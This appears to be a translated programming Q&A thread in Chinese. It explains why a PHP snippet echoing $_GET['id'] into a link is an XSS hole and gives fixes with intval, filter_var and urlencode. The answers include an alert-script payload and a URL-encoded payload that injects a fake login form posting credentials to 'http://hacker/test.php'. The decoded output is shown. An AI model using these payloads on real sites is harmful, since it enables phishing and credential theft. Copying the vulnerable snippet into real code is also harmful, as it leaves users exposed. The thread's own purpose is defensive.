我有这个 php 代码,我的 CMS 安全自动测试表明这是 XSS 攻击。为什么以及如何解决这个问题?
$url = "news.php";
if (isset($_GET['id']))
$url .= "?id=".$_GET["id"];
echo "<a href='{$url}'>News</a>";
这是 XSS(跨站点脚本),因为有人可以这样称呼您的东西:
?id='></a><script type='text/javascript'>alert('xss');</script><a href='
基本上把你的代码变成
<a href='news.php?id='></a><script type='text/javascript'>alert('xss');</script><a href=''>News</a>
现在,每当有人访问该站点时,它都会加载并运行alert('xss');
可能是重定向器或 cookie 窃取器的 javascript。
正如许多其他人所提到的,您可以通过使用filter_var
或intval
(如果它是一个数字)来解决这个问题。如果你想更高级,你也可以使用正则表达式来匹配你的字符串。
假设您接受 az AZ 和 0-9。这会起作用:
if (preg_match("/^[0-9a-zA-Z]+$", $_GET["id"])) {
//whatever
}
filter_input
甚至有一个手动输入完全符合您的要求(将您的输入清理到链接中):
<?php
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
$search_url = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_ENCODED);
echo "You have searched for $search_html.\n";
echo "<a href='?search=$search_url'>Search again.</a>";
?>
是的..一个简单的附加
site.php?id=%27%3E%3C%2Fa%3E%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before%0D%0A%09proceeding%3A%3Cform+action%3D%22http%3A%2F%2Fhacker%2Ftest.php%22%3E%3Ctable%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3ELogin%3A%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3EPassword%3A%0D%0A%09%09%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3C%2Ftable%3E%0D%0A%09%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%0D%0A%3C%2Fform%3E%3Ca+href%3D%27
^
|
Start XSS Injection
这将输出
<a href='news.php?id='></a>
<br>
<br>
Please login with the form below before proceeding:
<form action="http://hacker/test.php">
<table>
<tr>
<td>Login:</td>
<td><input type=text length=20 name=login></td>
</tr>
<tr>
<td>Password:</td>
<td><input type=text length=20 name=password></td>
</tr>
</table>
<input type=submit value=LOGIN>
</form>
<a href=''>News</a>
向您的客户询问用户名和密码以继续并将信息发送到http://hacker/test.php
,然后他们会直接恢复正常,就好像什么也没发生一样
要解决此问题,请尝试
$_GET["id"] = intval($_GET["id"]);
或者
$_GET["id"] = filter_var($_GET["id"], FILTER_SANITIZE_NUMBER_INT);
您需要进行 urlencode:
$url .= "?id=" . urlencode($_GET["id"]);
作为一个全局规则,您必须过滤 GET 和 POST 的内容。在使用 $_GET['id'] 的内容之前使用 filter_var。
$filtered_id = filter_var ($_GET['id'], FILTER_SANITIZE_NUMBER_INT);
// or at least
$id = (int) $_GET['id'];
切勿直接使用 $_GET 或 $_POST !!!你必须以某种方式逃避它..例如..
$url = "news.php";
if (isset($_GET['id']) && $id=intval($_GET["id"])>0){
$url .= "?id={$id}";
}
echo "<a href='{$url}'>News</a>";